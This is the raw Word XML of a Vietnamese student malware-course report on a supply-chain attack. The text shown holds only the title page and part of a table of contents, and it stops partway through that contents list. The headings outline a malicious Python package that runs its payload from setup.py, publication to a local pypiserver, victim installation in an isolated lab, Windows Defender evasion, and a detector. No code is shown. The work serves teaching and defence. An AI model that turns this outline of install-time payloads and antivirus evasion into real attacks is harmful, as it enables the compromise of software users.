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2858" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1400" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>BÁO CÁO ĐỒ ÁN MÃ ĐỘC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B299361" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>ĐỀ TÀI S04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0507E129" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>Supply Chain Software Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A558B2F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>TTP liên quan: T1195 — Supply Chain Compromise (MITRE ATT&amp;CK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC940C5" w14:textId="4D75D576" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">Môi trường: Ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="0062333B" w:rsidRPr="0062333B">
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>24.04.4 LTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Attacker/Registry) + Windows 1</w:t>
      </w:r>
      <w:r w:rsidR="0062333B">
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM (Victim) — Mạng host-only cô lập</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="1862236912"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="1E4BDCC1" w14:textId="319DF45D" w:rsidR="002D1355" w:rsidRDefault="002D1355">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="12ADEB06" w14:textId="0D5CD98A" w:rsidR="00C44D2D" w:rsidRDefault="002D1355">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="937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470563" w:history="1">
            <w:r w:rsidR="00C44D2D" w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>I. MỤC ĐÍCH VÀ BỐI CẢNH ĐỀ TÀI S04</w:t>
            </w:r>
            <w:r w:rsidR="00C44D2D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C44D2D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C44D2D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470563 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C44D2D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C44D2D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C44D2D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00C44D2D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="351DFBA7" w14:textId="5B1F17D8" w:rsidR="00C44D2D" w:rsidRDefault="00C44D2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470564" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>II. PHẦN A — TRIỂN KHAI PoC KỸ THUẬT (4.0 điểm)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470564 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A4C1187" w14:textId="5A7C00E3"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65" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.1 — Chuẩn bị môi trường phát triển Python trên Ubuntu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470565 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33495C68" w14:textId="072FEADB"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66" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.2 — Khởi tạo cấu trúc package PoC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470566 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="206ADEFF" w14:textId="58BB9EA9"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67" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.3 — Xây dựng logic mô phỏng hành vi (marker.py)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470567 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3EF98E9D" w14:textId="37574B46"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68" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.4 — Liên kết package với module thực thi (__init__.py)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470568 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06E0FCCC" w14:textId="45059F7F"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69" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.5 — Cơ chế kích hoạt payload (setup.py) — Module-level Execution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470569 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="004ED6D6" w14:textId="29D19E4E"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0" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.6 — Build package thành artifact phân phối</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470570 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B94701C" w14:textId="0DC961A6"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1" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.7 — Phát hành (Publish) package qua pypiserver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470571 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="389DCDFF" w14:textId="69E49FC2"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2" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.8 — Victim truy cập registry và xem artifact</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470572 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18F48030" w14:textId="441F7DFE"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3" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.9 — Victim tạo file nhử (decoy data) trước khi cài package</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470573 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76E66F07" w14:textId="0BC13788"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4" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.10 — Victim cài đặt package từ pypiserver nội bộ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470574 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="013E453A" w14:textId="47DEE9C2"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5" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.11 — Quan sát kết quả tấn công trên máy Attacker</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470575 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CF261EA" w14:textId="082F3012"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6" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A.12 — Dấu vết cài đặt (IOC): pip-req-build trong AppData\Temp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470576 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09A32F6B" w14:textId="49EA8448" w:rsidR="00C44D2D" w:rsidRDefault="00C44D2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470577" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>III. PHẦN B — BYPASS WINDOWS DEFENDER / AV (2.0 điểm)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470577 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="545EDFE8" w14:textId="20B5BF19"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8" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>B.1 — Phân tích tại sao payload tránh bị phát hiện (Evasion) — Từng lớp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470578 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56C09E6C" w14:textId="43F9245B"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79" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>B.2 — Tổng hợp kỹ thuật evasion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470579 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="368A7897" w14:textId="0C001DE3" w:rsidR="00C44D2D" w:rsidRDefault="00C44D2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470580" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IV. PHẦN C — DETECTOR: CÔNG CỤ PHÁT HIỆN (4.0 điểm)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470580 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79410D26" w14:textId="0DFE78CC"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81" w:history="1">
            <w:r w:rsidRPr="00C41B32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C.1 — Mục tiêu và thiết kế Detector</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc227470581 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
